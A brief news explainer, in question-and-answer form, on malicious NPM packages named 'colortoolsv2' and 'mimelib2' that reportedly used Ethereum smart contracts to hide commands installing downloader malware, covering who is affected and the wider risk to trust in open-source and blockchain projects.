What happened?
Hackers have been found to be exploiting vulnerabilities in commonly used NPM coding libraries, injecting malware into Ethereum smart contracts. This discovery was made by cybersecurity researchers at blockchain compliance firm Reversing Labs. The most damaging malware discovered, namely “colortoolsv2” and “mimelib2”, were able to abuse smart contracts to hide malicious commands which then install downloader malware onto infected systems.
Who does this affect?
This primarily affects developers who use these libraries for their projects as well as companies and individuals who interact with products made from these infected libraries. It also poses a risk to the wider Ethereum and NPM community, and any users who could potentially interact with infected smart contracts. Furthermore, GitHub and NPM are also affected as these platforms house the packages infiltrated by malicious actors.
Why does this matter?
The exploitation of these vulnerabilities can lead to considerable market impact. The injected malware can lead to massive breaches of data security and safety, potentially leading to financial losses and fraudulent activities. Furthermore, it disrupts trust in Ethereum based smart contracts and the broader open-source project community which can suppress innovation and technology development within the cryptocurrency and blockchain sector.